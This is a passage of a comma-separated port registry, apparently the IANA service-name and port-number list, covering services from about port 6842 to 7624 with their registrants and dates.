HTTP,[Urs_Bertschinger],[Urs_Bertschinger],,,,,, netmo-http,6842,udp,Netmo HTTP,[Urs_Bertschinger],[Urs_Bertschinger],,,,,, ,6843-6849,,Unassigned,,,,,,,, iccrushmore,6850,tcp,ICCRUSHMORE,[Dave_Hubbard],[Dave_Hubbard],,,,,, iccrushmore,6850,udp,ICCRUSHMORE,[Dave_Hubbard],[Dave_Hubbard],,,,,, ,6851-6867,,Unassigned,,,,,,,, acctopus-cc,6868,tcp,Acctopus Command Channel,[Stefan_Auweiler],[Stefan_Auweiler],2009-11-16,,,,, acctopus-st,6868,udp,Acctopus Status,[Stefan_Auweiler],[Stefan_Auweiler],2009-11-16,,,,, ,6869-6887,,Unassigned,,,,,,,, muse,6888,tcp,MUSE,[Muse_Communications],[Muse_Communications],,,,,, muse,6888,udp,MUSE,[Muse_Communications],[Muse_Communications],,,,,, ,6889-6900,,Unassigned,,,,,,,, jetstream,6901,tcp,Novell Jetstream messaging protocol,[Anil_Tyagi],[Anil_Tyagi],2010-06-11,,,,, ,6901,udp,Reserved,,,,,,,, ,6902-6934,,Unassigned,,,,,,,, ethoscan,6935,tcp,EthoScan Service,[Marty_Campbell],[Marty_Campbell],2011-06-10,,,,, ethoscan,6935,udp,EthoScan Service,[Marty_Campbell],[Marty_Campbell],2011-06-10,,,,, xsmsvc,6936,tcp,XenSource Management Service,[Roger_Klorese],[Roger_Klorese],2006-06,,,,, xsmsvc,6936,udp,XenSource Management Service,[Roger_Klorese],[Roger_Klorese],2006-06,,,,, ,6937-6945,,Unassigned,,,,,,,, bioserver,6946,tcp,Biometrics Server,[ISHII_AKIO],[ISHII_AKIO],2006-01,,,,, bioserver,6946,udp,Biometrics Server,[ISHII_AKIO],[ISHII_AKIO],2006-01,,,,, ,6947-6950,,Unassigned,,,,,,,, otlp,6951,tcp,OTLP,[Brent_Foster],[Brent_Foster],2006-04,,,,, otlp,6951,udp,OTLP,[Brent_Foster],[Brent_Foster],2006-04,,,,, ,6952-6960,,Unassigned,,,,,,,, jmact3,6961,tcp,JMACT3,[Yutaka_Ono],[Yutaka_Ono],,,,,, jmact3,6961,udp,JMACT3,[Yutaka_Ono],[Yutaka_Ono],,,,,, jmevt2,6962,tcp,jmevt2,[Yutaka_Ono],[Yutaka_Ono],,,,,, jmevt2,6962,udp,jmevt2,[Yutaka_Ono],[Yutaka_Ono],,,,,, swismgr1,6963,tcp,swismgr1,[Yutaka_Ono],[Yutaka_Ono],,,,,, swismgr1,6963,udp,swismgr1,[Yutaka_Ono],[Yutaka_Ono],,,,,, swismgr2,6964,tcp,swismgr2,[Yutaka_Ono],[Yutaka_Ono],,,,,, swismgr2,6964,udp,swismgr2,[Yutaka_Ono],[Yutaka_Ono],,,,,, swistrap,6965,tcp,swistrap,[Yutaka_Ono],[Yutaka_Ono],,,,,, swistrap,6965,udp,swistrap,[Yutaka_Ono],[Yutaka_Ono],,,,,, swispol,6966,tcp,swispol,[Yutaka_Ono],[Yutaka_Ono],,,,,, swispol,6966,udp,swispol,[Yutaka_Ono],[Yutaka_Ono],,,,,, ,6967-6968,,Unassigned,,,,,,,, acmsoda,6969,tcp,acmsoda,[Daniel_Simms],[Daniel_Simms],,,,,, acmsoda,6969,udp,acmsoda,[Daniel_Simms],[Daniel_Simms],,,,,, ,6970-6996,,Unassigned,,,,,,,, MobilitySrv,6997,tcp,Mobility XE Protocol,[Joseph_T_Savarese],[Joseph_T_Savarese],2007-06,,,,, MobilitySrv,6997,udp,Mobility XE Protocol,[Joseph_T_Savarese],[Joseph_T_Savarese],2007-06,,,,, iatp-highpri,6998,tcp,IATP-highPri,[John_Murphy],[John_Murphy],,,,,, iatp-highpri,6998,udp,IATP-highPri,[John_Murphy],[John_Murphy],,,,,, iatp-normalpri,6999,tcp,IATP-normalPri,[John_Murphy],[John_Murphy],,,,,, iatp-normalpri,6999,udp,IATP-normalPri,[John_Murphy],[John_Murphy],,,,,, afs3-fileserver,7000,tcp,file server itself,,,,,,,, afs3-fileserver,7000,udp,file server itself,,,,,,,, afs3-callback,7001,tcp,callbacks to cache managers,,,,,,,Known Unauthorized Use on port 7001, afs3-callback,7001,udp,callbacks to cache managers,,,,,,,Known Unauthorized Use on port 7001, afs3-prserver,7002,tcp,users & groups database,,,,,,,Known Unauthorized Use on port 7002, afs3-prserver,7002,udp,users & groups database,,,,,,,Known Unauthorized Use on port 7002, afs3-vlserver,7003,tcp,volume location database,,,,,,,, afs3-vlserver,7003,udp,volume location database,,,,,,,, afs3-kaserver,7004,tcp,AFS/Kerberos authentication service,,,,,,,, afs3-kaserver,7004,udp,AFS/Kerberos authentication service,,,,,,,, afs3-volser,7005,tcp,volume managment server,,,,,,,Known Unauthorized Use on port 7005, afs3-volser,7005,udp,volume managment server,,,,,,,Known Unauthorized Use on port 7005, afs3-errors,7006,tcp,error interpretation service,,,,,,,, afs3-errors,7006,udp,error interpretation service,,,,,,,, afs3-bos,7007,tcp,basic overseer process,,,,,,,, afs3-bos,7007,udp,basic overseer process,,,,,,,, afs3-update,7008,tcp,server-to-server updater,,,,,,,, afs3-update,7008,udp,server-to-server updater,,,,,,,, afs3-rmtsys,7009,tcp,remote cache manager service,,,,,,,, afs3-rmtsys,7009,udp,remote cache manager service,,,,,,,, ups-onlinet,7010,tcp,onlinet uninterruptable power supplies,[Jim_Thompson],[Jim_Thompson],,,,,, ups-onlinet,7010,udp,onlinet uninterruptable power supplies,[Jim_Thompson],[Jim_Thompson],,,,,, talon-disc,7011,tcp,Talon Discovery Port,[Jim_Thompson],[Jim_Thompson],,,,,Known Unauthorized Use on 7011, talon-disc,7011,udp,Talon Discovery Port,[Jim_Thompson],[Jim_Thompson],,,,,Known Unauthorized Use on 7011, talon-engine,7012,tcp,Talon Engine,[Jim_Thompson],[Jim_Thompson],,,,,Known Unauthorized Use on 7011, talon-engine,7012,udp,Talon Engine,[Jim_Thompson],[Jim_Thompson],,,,,Known Unauthorized Use on 7011, microtalon-dis,7013,tcp,Microtalon Discovery,[Jim_Thompson],[Jim_Thompson],,,,,, microtalon-dis,7013,udp,Microtalon Discovery,[Jim_Thompson],[Jim_Thompson],,,,,, microtalon-com,7014,tcp,Microtalon Communications,[Jim_Thompson],[Jim_Thompson],,,,,, microtalon-com,7014,udp,Microtalon Communications,[Jim_Thompson],[Jim_Thompson],,,,,, talon-webserver,7015,tcp,Talon Webserver,[Jim_Thompson],[Jim_Thompson],,,,,, talon-webserver,7015,udp,Talon Webserver,[Jim_Thompson],[Jim_Thompson],,,,,, ,7016-7017,,Unassigned,,,,,,,, fisa-svc,7018,tcp,FISA Service,[FAUCONNET_Ingenierie],[FAUCONNET_Ingenierie],2011-05-19,,,,, ,7018,udp,Reserved,,,,,,,, doceri-ctl,7019,tcp,doceri drawing service control,[Paul_Brown],[Paul_Brown],2011-04-27,,,,, doceri-view,7019,udp,doceri drawing service screen view,[Paul_Brown],[Paul_Brown],2011-04-27,,,,, dpserve,7020,tcp,DP Serve,[Allan_Stanley],[Allan_Stanley],,,,,, dpserve,7020,udp,DP Serve,[Allan_Stanley],[Allan_Stanley],,,,,, dpserveadmin,7021,tcp,DP Serve Admin,[Allan_Stanley],[Allan_Stanley],,,,,, dpserveadmin,7021,udp,DP Serve Admin,[Allan_Stanley],[Allan_Stanley],,,,,, ctdp,7022,tcp,CT Discovery Protocol,[James_Kirkwood],[James_Kirkwood],2005-06,,,,, ctdp,7022,udp,CT Discovery Protocol,[James_Kirkwood],[James_Kirkwood],2005-06,,,,, ct2nmcs,7023,tcp,Comtech T2 NMCS,[Bryan_Wilcutt],[Bryan_Wilcutt],2005-06,,,,, ct2nmcs,7023,udp,Comtech T2 NMCS,[Bryan_Wilcutt],[Bryan_Wilcutt],2005-06,,,,, vmsvc,7024,tcp,Vormetric service,[Tom_Boyle],[Tom_Boyle],2005-06,,,,, vmsvc,7024,udp,Vormetric service,[Tom_Boyle],[Tom_Boyle],2005-06,,,,, vmsvc-2,7025,tcp,Vormetric Service II,[Tom_Boyle],[Tom_Boyle],2005-06,,,,, vmsvc-2,7025,udp,Vormetric Service II,[Tom_Boyle],[Tom_Boyle],2005-06,,,,, ,7026-7029,,Unassigned,,,,,,,, op-probe,7030,tcp,ObjectPlanet probe,[Bjorn_Jarle_Kvande],[Bjorn_Jarle_Kvande],2002-04,,,,, op-probe,7030,udp,ObjectPlanet probe,[Bjorn_Jarle_Kvande],[Bjorn_Jarle_Kvande],2002-04,,,,, iposplanet,7031,tcp,IPOSPLANET retailing multi devices protocol,[Fabrice_Paget],[Fabrice_Paget],2012-10-23,,,,, ,7031,udp,Reserved,,,,,,,, ,7032-7039,,Unassigned,,,,,,,, ,7040,tcp,Reserved,,,,,,,, quest-disc,7040,udp,Quest application level network service discovery,[Quest_Software],[Henrik_Johnson],2012-04-09,,,,, ,7041-7069,,Unassigned,,,,,,,, arcp,7070,tcp,ARCP,[Jude_George],[Jude_George],,,,,, arcp,7070,udp,ARCP,[Jude_George],[Jude_George],,,,,, iwg1,7071,tcp,IWGADTS Aircraft Housekeeping Message,[Don_Sullivan],[Don_Sullivan],2010-02-16,,,,, iwg1,7071,udp,IWGADTS Aircraft Housekeeping Message,[Don_Sullivan],[Don_Sullivan],2010-02-16,,,,, ,7072,,Unassigned,,,,,,,, martalk,7073,tcp,MarTalk protocol,[Mahr_GmbH_Göttingen],[Kevin_Bube],2013-09-02,,,,, ,7073,udp,Reserved,,,,,,,, ,7074-7079,,Unassigned,,,,,,,, empowerid,7080,tcp,EmpowerID Communication,[Matthew_Whited],[Matthew_Whited],2008-01-16,,,,, empowerid,7080,udp,EmpowerID Communication,[Matthew_Whited],[Matthew_Whited],2008-01-16,,,,, ,7081-7094,,Unassigned,,,,,,,, jdp-disc,7095,udp,Java Discovery Protocol,[OpenJDK],[Florian_Weimer],2013-03-12,,,,, ,7095,tcp,Reserved,,,,,,,, ,7096-7098,,Unassigned,,,,,,,, lazy-ptop,7099,tcp,lazy-ptop,[Guy_Keren],[Guy_Keren],,,,,, lazy-ptop,7099,udp,lazy-ptop,[Guy_Keren],[Guy_Keren],,,,,, font-service,7100,tcp,X Font Service,[Stephen_Gildea],[Stephen_Gildea],,,,,, font-service,7100,udp,X Font Service,[Stephen_Gildea],[Stephen_Gildea],,,,,, elcn,7101,tcp,Embedded Light Control Network,[Michael_Scarito],[Michael_Scarito],2007-02,,,,, elcn,7101,udp,Embedded Light Control Network,[Michael_Scarito],[Michael_Scarito],2007-02,,,,, ,7102-7106,,Unassigned,,,,,,,, ,7107,tcp,Reserved,,,,,,,, aes-x170,7107,udp,AES-X170,[Richard_Foss],[Richard_Foss],2011-02-10,,,,, ,7108-7120,,Unassigned,,,,,,,, virprot-lm,7121,tcp,Virtual Prototypes License Manager,[Victor_Galis],[Victor_Galis],,,,,, virprot-lm,7121,udp,Virtual Prototypes License Manager,[Victor_Galis],[Victor_Galis],,,,,, ,7122-7127,,Unassigned,,,,,,,, scenidm,7128,tcp,intelligent data manager,[Paul_Ignatius],[Paul_Ignatius],2006-03,,,,, scenidm,7128,udp,intelligent data manager,[Paul_Ignatius],[Paul_Ignatius],2006-03,,,,, scenccs,7129,tcp,Catalog Content Search,[Anil_Sharma],[Anil_Sharma],2006-04,,,,, scenccs,7129,udp,Catalog Content Search,[Anil_Sharma],[Anil_Sharma],2006-04,,,,, ,7130-7160,,Unassigned,,,,,,,, cabsm-comm,7161,tcp,CA BSM Comm,[Chun_Ho_Chang],[Chun_Ho_Chang],2004-11,,,,, cabsm-comm,7161,udp,CA BSM Comm,[Chun_Ho_Chang],[Chun_Ho_Chang],2004-11,,,,, caistoragemgr,7162,tcp,CA Storage Manager,[Emre_Tunar],[Emre_Tunar],2004-11,,,,, caistoragemgr,7162,udp,CA Storage Manager,[Emre_Tunar],[Emre_Tunar],2004-11,,,,, cacsambroker,7163,tcp,CA Connection Broker,[David_Roberts],[David_Roberts],2005-05,,,,, cacsambroker,7163,udp,CA Connection Broker,[David_Roberts],[David_Roberts],2005-05,,,,, fsr,7164,tcp,File System Repository Agent,[Micha_Ben_Efraim],[Micha_Ben_Efraim],2007-07-19,,,,, fsr,7164,udp,File System Repository Agent,[Micha_Ben_Efraim],[Micha_Ben_Efraim],2007-07-19,,,,, doc-server,7165,tcp,Document WCF Server,[Micha_Ben_Efraim],[Micha_Ben_Efraim],2008-01-07,,,,, doc-server,7165,udp,Document WCF Server,[Micha_Ben_Efraim],[Micha_Ben_Efraim],2008-01-07,,,,, aruba-server,7166,tcp,Aruba eDiscovery Server,[Micha_Ben_Efraim],[Micha_Ben_Efraim],2008-01-07,,,,, aruba-server,7166,udp,Aruba eDiscovery Server,[Micha_Ben_Efraim],[Micha_Ben_Efraim],2008-01-07,,,,, casrmagent,7167,tcp,CA SRM Agent,[Venkata_Krishna],[Venkata_Krishna],2010-02-24,,,,, ,7167,udp,Reserved,,,,,,,, cnckadserver,7168,tcp,cncKadServer DB & Inventory Services,[Micha_Ben_Efraim_2],[Micha_Ben_Efraim_2],2011-01-31,,,,, ,7168,udp,Reserved,,,,,,,, ccag-pib,7169,tcp,Consequor Consulting Process Integration Bridge,[Frank_Goenninger],[Frank_Goenninger],2010-02-22,,,,, ccag-pib,7169,udp,Consequor Consulting Process Integration Bridge,[Frank_Goenninger],[Frank_Goenninger],2010-02-22,,,,, nsrp,7170,tcp,Adaptive Name/Service Resolution,[Geoff_Back_2],[Geoff_Back_2],2010-02-01,,,,, nsrp,7170,udp,Adaptive Name/Service Resolution,[Geoff_Back_2],[Geoff_Back_2],2010-02-01,,,,, drm-production,7171,tcp,Discovery and Retention Mgt Production,[Micha_Ben_Efraim_3],[Micha_Ben_Efraim_3],2010-02-18,,,,, drm-production,7171,udp,Discovery and Retention Mgt Production,[Micha_Ben_Efraim_3],[Micha_Ben_Efraim_3],2010-02-18,,,,, metalbend,7172,tcp,Port used for MetalBend programmable interface,[Micha_Ben_Efraim_4],[Micha_Ben_Efraim_4],2012-11-27,,,,, ,7172,udp,Reserved,,,,,,,, zsecure,7173,tcp,zSecure Server,[Hans_Schoone],[Hans_Schoone],2010-10-01,,,,, ,7173,udp,Reserved,,,,,,,, clutild,7174,tcp,Clutild,[Cheryl_Stoutenburg],[Cheryl_Stoutenburg],,,,,, clutild,7174,udp,Clutild,[Cheryl_Stoutenburg],[Cheryl_Stoutenburg],,,,,, ,7175-7180,,Unassigned,,,,,,,, janus-disc,7181,udp,Janus Guidewire Enterprise Discovery Service Bus,[Guidewire_Software_Inc],[Luca_Debiasi],2014-02-06,,,,, ,7181,tcp,Reserved,,,,,,,, ,7182-7199,,Unassigned,,,,,,,, fodms,7200,tcp,FODMS FLIP,[David_Anthony],[David_Anthony],,,,,, fodms,7200,udp,FODMS FLIP,[David_Anthony],[David_Anthony],,,,,, dlip,7201,tcp,DLIP,[Albert_Manfredi],[Albert_Manfredi],,,,,, dlip,7201,udp,DLIP,[Albert_Manfredi],[Albert_Manfredi],,,,,, ,7202-7226,,Unassigned,,,,,,,, ramp,7227,tcp,Registry A & M Protocol,[John_Havard],[John_Havard],2003-11,,,,, ramp,7227,udp,Registry A $ M Protocol,[John_Havard],[John_Havard],2003-11,,,,, citrixupp,7228,tcp,Citrix Universal Printing Port,[Gary_Barton],[Gary_Barton],2011-02-24,,,,, ,7228,udp,Reserved,,,,,,,, citrixuppg,7229,tcp,Citrix UPP Gateway,[Gary_Barton],[Gary_Barton],2011-02-24,,,,, ,7229,udp,Reserved,,,,,,,, ,7230-7234,,Unassigned,,,,,,,, aspcoordination,7235,udp,ASP Coordination Protocol,[Wi-Fi_Alliance_2],[Mick_Conley],2013-12-31,,,,, ,7235,tcp,Reserved,,,,,,,, display,7236,tcp,Wi-Fi Alliance Wi-Fi Display Protocol,[Wi-Fi_Alliance],[Thomas_Sciorilli],2012-04-09,,,,,Defined TXT keys: _display.tcp. Display Protocol ,7236,udp,Reserved,,,,,,,, pads,7237,tcp,PADS (Public Area Display System) Server,[Willie_Jan_Bons],[Willie_Jan_Bons],2011-03-10,,,,, ,7237,udp,Reserved,,,,,,,, ,7238-7261,,Unassigned,,,,,,,, cnap,7262,tcp,Calypso Network Access Protocol,[Scott_Halberg],[Scott_Halberg],2009-06-02,,,,, cnap,7262,udp,Calypso Network Access Protocol,[Scott_Halberg],[Scott_Halberg],2009-06-02,,,,, ,7263-7271,,Unassigned,,,,,,,, watchme-7272,7272,tcp,WatchMe Monitoring 7272,[Oliver_Heinz],[Oliver_Heinz],2005-08,,,,, watchme-7272,7272,udp,WatchMe Monitoring 7272,[Oliver_Heinz],[Oliver_Heinz],2005-08,,,,, oma-rlp,7273,tcp,OMA Roaming Location,[Larry_A_Young],[Larry_A_Young],2005-08,,,,, oma-rlp,7273,udp,OMA Roaming Location,[Larry_A_Young],[Larry_A_Young],2005-08,,,,, oma-rlp-s,7274,tcp,OMA Roaming Location SEC,[Larry_A_Young],[Larry_A_Young],2005-08,,,,, oma-rlp-s,7274,udp,OMA Roaming Location SEC,[Larry_A_Young],[Larry_A_Young],2005-08,,,,, oma-ulp,7275,tcp,OMA UserPlane Location,[Larry_A_Young_2],[Larry_A_Young_2],2006-02,,,,, oma-ulp,7275,udp,OMA UserPlane Location,[Larry_A_Young_2],[Larry_A_Young_2],2006-02,,,,, oma-ilp,7276,tcp,OMA Internal Location Protocol,[Khiem_Tran],[Khiem_Tran],2007-11-06,,,,, oma-ilp,7276,udp,OMA Internal Location Protocol,[Khiem_Tran],[Khiem_Tran],2007-11-06,,,,, oma-ilp-s,7277,tcp,OMA Internal Location Secure Protocol,[Khiem_Tran],[Khiem_Tran],2007-11-06,,,,, oma-ilp-s,7277,udp,OMA Internal Location Secure Protocol,[Khiem_Tran],[Khiem_Tran],2007-11-06,,,,, oma-dcdocbs,7278,tcp,OMA Dynamic Content Delivery over CBS,[Avi_Primo],[Avi_Primo],2008-01-29,,,,, oma-dcdocbs,7278,udp,OMA Dynamic Content Delivery over CBS,[Avi_Primo],[Avi_Primo],2008-01-29,,,,, ctxlic,7279,tcp,Citrix Licensing,[Marc_Binstock],[Marc_Binstock],2008-01-29,,,,, ctxlic,7279,udp,Citrix Licensing,[Marc_Binstock],[Marc_Binstock],2008-01-29,,,,, itactionserver1,7280,tcp,ITACTIONSERVER 1,[Brian_Taylor],[Brian_Taylor],,,,,, itactionserver1,7280,udp,ITACTIONSERVER 1,[Brian_Taylor],[Brian_Taylor],,,,,, itactionserver2,7281,tcp,ITACTIONSERVER 2,[Brian_Taylor],[Brian_Taylor],,,,,, itactionserver2,7281,udp,ITACTIONSERVER 2,[Brian_Taylor],[Brian_Taylor],,,,,, mzca-action,7282,tcp,eventACTION/ussACTION (MZCA) server,[Gord_Tomlin],[Gord_Tomlin],2009-01-30,,,,, mzca-alert,7282,udp,eventACTION/ussACTION (MZCA) alert,[Gord_Tomlin],[Gord_Tomlin],2010-01-21,,,,, genstat,7283,tcp,General Statistics Rendezvous Protocol,[VSN_International_Ltd],[Sean_D_Sollé],2011-09-28,,,,, ,7283,udp,Reserved,,,,,,,, ,7284-7299,,Unassigned,,,,,,,, swx,7300-7359,,The Swiss Exchange,[Edgar_Blum],[Edgar_Blum],,,,,, ,7360-7364,,Unassigned,,,,2006-02-06,,,, lcm-server,7365,tcp,LifeKeeper Communications,[James_Bottomley],[James_Bottomley],2006-02,,,,, lcm-server,7365,udp,LifeKeeper Communications,[James_Bottomley],[James_Bottomley],2006-02,,,,, ,7366-7390,,Unassigned,,,,2006-02-06,,,, mindfilesys,7391,tcp,mind-file system server,[Dave_Porter],[Dave_Porter],,,,,, mindfilesys,7391,udp,mind-file system server,[Dave_Porter],[Dave_Porter],,,,,, mrssrendezvous,7392,tcp,mrss-rendezvous server,[Dave_Porter],[Dave_Porter],,,,,, mrssrendezvous,7392,udp,mrss-rendezvous server,[Dave_Porter],[Dave_Porter],,,,,, nfoldman,7393,tcp,nFoldMan Remote Publish,[Richard_McDonald],[Richard_McDonald],2006-01,,,,, nfoldman,7393,udp,nFoldMan Remote Publish,[Richard_McDonald],[Richard_McDonald],2006-01,,,,, fse,7394,tcp,File system export of backup images,[Weibao_Wu],[Weibao_Wu],2006-04,,,,, fse,7394,udp,File system export of backup images,[Weibao_Wu],[Weibao_Wu],2006-04,,,,, winqedit,7395,tcp,winqedit,[David_Greer],[David_Greer],,,,,, winqedit,7395,udp,winqedit,[David_Greer],[David_Greer],,,,,, ,7396,,Unassigned,,,,,,,, hexarc,7397,tcp,Hexarc Command Language,[George_Moromisato],[George_Moromisato],2004-11,,,,, hexarc,7397,udp,Hexarc Command Language,[George_Moromisato],[George_Moromisato],2004-11,,,,, ,7398-7399,,Unassigned,,,,,,,, rtps-discovery,7400,tcp,RTPS Discovery,[Gerardo_Pardo_Castel],[Gerardo_Pardo_Castel],2005-10,,,,, rtps-discovery,7400,udp,RTPS Discovery,[Gerardo_Pardo_Castel],[Gerardo_Pardo_Castel],2005-10,,,,, rtps-dd-ut,7401,tcp,RTPS Data-Distribution User-Traffic,[Gerardo_Pardo_Castel],[Gerardo_Pardo_Castel],2005-10,,,,, rtps-dd-ut,7401,udp,RTPS Data-Distribution User-Traffic,[Gerardo_Pardo_Castel],[Gerardo_Pardo_Castel],2005-10,,,,, rtps-dd-mt,7402,tcp,RTPS Data-Distribution Meta-Traffic,[Gerardo_Pardo_Castel],[Gerardo_Pardo_Castel],2005-10,,,,, rtps-dd-mt,7402,udp,RTPS Data-Distribution Meta-Traffic,[Gerardo_Pardo_Castel],[Gerardo_Pardo_Castel],2005-10,,,,, ,7403-7409,,Unassigned,,,,,,,, ionixnetmon,7410,tcp,Ionix Network Monitor,[Maxime_Deputter],[Maxime_Deputter],2006-04,,,,, ionixnetmon,7410,udp,Ionix Network Monitor,[Maxime_Deputter],[Maxime_Deputter],2006-04,,,,, daqstream,7411,tcp,Streaming of measurement data,[Hottinger_Baldwin_Messtechnik_GmbH],[Stephan_Gatzka],2013-03-15,,,,, daqstream,7411,udp,Streaming of measurement data,[Hottinger_Baldwin_Messtechnik_GmbH],[Stephan_Gatzka],2013-03-15,,,,, ,7412-7420,,Unassigned,,,,,,,, mtportmon,7421,tcp,Matisse Port Monitor,[Didier_Cabannes],[Didier_Cabannes],2004-11,,,,, mtportmon,7421,udp,Matisse Port Monitor,[Didier_Cabannes],[Didier_Cabannes],2004-11,,,,, ,7422-7425,,Unassigned,,,,,,,, pmdmgr,7426,tcp,OpenView DM Postmaster Manager,[Dave_Lamb],[Dave_Lamb],,,,,, pmdmgr,7426,udp,OpenView DM Postmaster Manager,[Dave_Lamb],[Dave_Lamb],,,,,, oveadmgr,7427,tcp,OpenView DM Event Agent Manager,[Dave_Lamb],[Dave_Lamb],,,,,, oveadmgr,7427,udp,OpenView DM Event Agent Manager,[Dave_Lamb],[Dave_Lamb],,,,,, ovladmgr,7428,tcp,OpenView DM Log Agent Manager,[Dave_Lamb],[Dave_Lamb],,,,,, ovladmgr,7428,udp,OpenView DM Log Agent Manager,[Dave_Lamb],[Dave_Lamb],,,,,, opi-sock,7429,tcp,OpenView DM rqt communication,[Dave_Lamb],[Dave_Lamb],,,,,, opi-sock,7429,udp,OpenView DM rqt communication,[Dave_Lamb],[Dave_Lamb],,,,,, xmpv7,7430,tcp,OpenView DM xmpv7 api pipe,[Dave_Lamb],[Dave_Lamb],,,,,, xmpv7,7430,udp,OpenView DM xmpv7 api pipe,[Dave_Lamb],[Dave_Lamb],,,,,, pmd,7431,tcp,OpenView DM ovc/xmpv3 api pipe,[Dave_Lamb],[Dave_Lamb],,,,,, pmd,7431,udp,OpenView DM ovc/xmpv3 api pipe,[Dave_Lamb],[Dave_Lamb],,,,,, ,7432-7436,,Unassigned,,,,,,,, faximum,7437,tcp,Faximum,[George_Pajari],[George_Pajari],,,,,, faximum,7437,udp,Faximum,[George_Pajari],[George_Pajari],,,,,, ,7438-7442,,Unassigned,,,,,,,, oracleas-https,7443,tcp,Oracle Application Server HTTPS,[David_McMarlin],[David_McMarlin],2006-08,,,,, oracleas-https,7443,udp,Oracle Application Server HTTPS,[David_McMarlin],[David_McMarlin],2006-08,,,,, ,7444-7470,,Unassigned,,,,,,,, sttunnel,7471,tcp,Stateless Transport Tunneling Protocol,[Bruce_Davie_3],[Bruce_Davie_3],2014-04-28,,,,, ,7471,udp,Reserved,,,,,,,, ,7472,,Unassigned,,,,,,,, rise,7473,tcp,Rise: The Vieneo Province,[Jason_Reskin],[Jason_Reskin],2007-03,,,,, rise,7473,udp,Rise: The Vieneo Province,[Jason_Reskin],[Jason_Reskin],2007-03,,,,, neo4j,7474,tcp,Neo4j Graph Database,[Neo_Technology_Inc],[Julian_Simpson],2013-02-08,,,,, ,7474,udp,Reserved,,,,,,,, ,7475-7490,,Unassigned,,,,,,,, telops-lmd,7491,tcp,telops-lmd,[David_Spencer],[David_Spencer],,,,,, telops-lmd,7491,udp,telops-lmd,[David_Spencer],[David_Spencer],,,,,, ,7492-7499,,Unassigned,,,,,,,Known Unauthorized Use on port 7499, silhouette,7500,tcp,Silhouette User,[Anthony_Payne],[Anthony_Payne],2004-02,,,,, silhouette,7500,udp,Silhouette User,[Anthony_Payne],[Anthony_Payne],2004-02,,,,, ovbus,7501,tcp,HP OpenView Bus Daemon,[David_M_Rhodes],[David_M_Rhodes],,,,,Known Unauthorized Use on port 7501, ovbus,7501,udp,HP OpenView Bus Daemon,[David_M_Rhodes],[David_M_Rhodes],,,,,Known Unauthorized Use on port 7501, ,7502-7507,,Unassigned,,,,,,,, adcp,7508,tcp,Automation Device Configuration Protocol,[Festo_AG],[Joerg_Ullmann],2011-05-27,2012-07-26,,,, ,7508,udp,Reserved,,,,,,,, acplt,7509,tcp,ACPLT - process automation service,[Chair_for_Process_Control_Engineering],[Ulrich_Epple],2010-12-07,2012-08-07,,,, ,7509,udp,Reserved,,,,,,,, ovhpas,7510,tcp,HP OpenView Application Server,[Jeff_Conrad],[Jeff_Conrad],,,,,, ovhpas,7510,udp,HP OpenView Application Server,[Jeff_Conrad],[Jeff_Conrad],,,,,, pafec-lm,7511,tcp,pafec-lm,[Billy_Dhillon],[Billy_Dhillon],,,,,, pafec-lm,7511,udp,pafec-lm,[Billy_Dhillon],[Billy_Dhillon],,,,,, ,7512-7541,,Unassigned,,,,,,,, saratoga,7542,tcp,Saratoga Transfer Protocol,[Lloyd_Wood],[Lloyd_Wood],2007-05,,,,, saratoga,7542,udp,Saratoga Transfer Protocol,[Lloyd_Wood],[Lloyd_Wood],2007-05,,,,, atul,7543,tcp,atul server,[Mark_Stapp],[Mark_Stapp],2006-01,,,,, atul,7543,udp,atul server,[Mark_Stapp],[Mark_Stapp],2006-01,,,,, nta-ds,7544,tcp,FlowAnalyzer DisplayServer,[Fred_Messinger],[Fred_Messinger],,,,,, nta-ds,7544,udp,FlowAnalyzer DisplayServer,[Fred_Messinger],[Fred_Messinger],,,,,, nta-us,7545,tcp,FlowAnalyzer UtilityServer,[Fred_Messinger],[Fred_Messinger],,,,,, nta-us,7545,udp,FlowAnalyzer UtilityServer,[Fred_Messinger],[Fred_Messinger],,,,,, cfs,7546,tcp,Cisco Fabric service,[Rituparna_Agrawal],[Rituparna_Agrawal],2005-09,,,,, cfs,7546,udp,Cisco Fabric service,[Rituparna_Agrawal],[Rituparna_Agrawal],2005-09,,,,, cwmp,7547,tcp,DSL Forum CWMP,[Anton_Okmianski],[Anton_Okmianski],2006-01,,,,, cwmp,7547,udp,DSL Forum CWMP,[Anton_Okmianski],[Anton_Okmianski],2006-01,,,,, tidp,7548,tcp,Threat Information Distribution Protocol,[Chui_Tin_Yen],[Chui_Tin_Yen],2006-02,,,,, tidp,7548,udp,Threat Information Distribution Protocol,[Chui_Tin_Yen],[Chui_Tin_Yen],2006-02,,,,, nls-tl,7549,tcp,Network Layer Signaling Transport Layer,[Melinda_Shore],[Melinda_Shore],2006-05,,,,, nls-tl,7549,udp,Network Layer Signaling Transport Layer,[Melinda_Shore],[Melinda_Shore],2006-05,,,,, ,7550,tcp,Reserved,,,,,,,, cloudsignaling,7550,udp,Cloud Signaling Service,[Scott_Dawson],[Scott_Dawson],2011-07-01,,,,, ,7551-7559,,Unassigned,,,,,,,, sncp,7560,tcp,Sniffer Command Protocol,[Dominick_Cafarelli],[Dominick_Cafarelli],2005-08,,,,, sncp,7560,udp,Sniffer Command Protocol,[Dominick_Cafarelli],[Dominick_Cafarelli],2005-08,,,,, ,7561-7562,,Unassigned,,,,,,,, cfw,7563,tcp,Control Framework,,,,,[RFC6230],,, ,7563,udp,Reserved,,,,,,,, ,7564-7565,,Unassigned,,,,,,,, vsi-omega,7566,tcp,VSI Omega,[Curtis_Smith],[Curtis_Smith],,,,,, vsi-omega,7566,udp,VSI Omega,[Curtis_Smith],[Curtis_Smith],,,,,, ,7567-7568,,Unassigned,,,,,,,, dell-eql-asm,7569,tcp,Dell EqualLogic Host Group Management,[James_E_King_III],[James_E_King_III],,,,,, ,7569,udp,Reserved,,,,,,,, aries-kfinder,7570,tcp,Aries Kfinder,[James_King_III],[James_King_III],,,,,, aries-kfinder,7570,udp,Aries Kfinder,[James_King_III],[James_King_III],,,,,, ,7571-7573,,Unassigned,,,,,,,, coherence,7574,tcp,Oracle Coherence Cluster Service,[Oracle_5],[Mark_Falco],2014-07-09,,,,, coherence-disc,7574,udp,Oracle Coherence Cluster discovery service,[Oracle_5],[Mark_Falco],2014-07-09,,,,, ,7575-7587,,Unassigned,,,,,,,, sun-lm,7588,tcp,Sun License Manager,[Sophie_Deng],[Sophie_Deng],,,,,, sun-lm,7588,udp,Sun License Manager,[Sophie_Deng],[Sophie_Deng],,,,,, ,7589-7623,,Unassigned,,,,,,,, indi,7624,tcp,Instrument Neutral Distributed 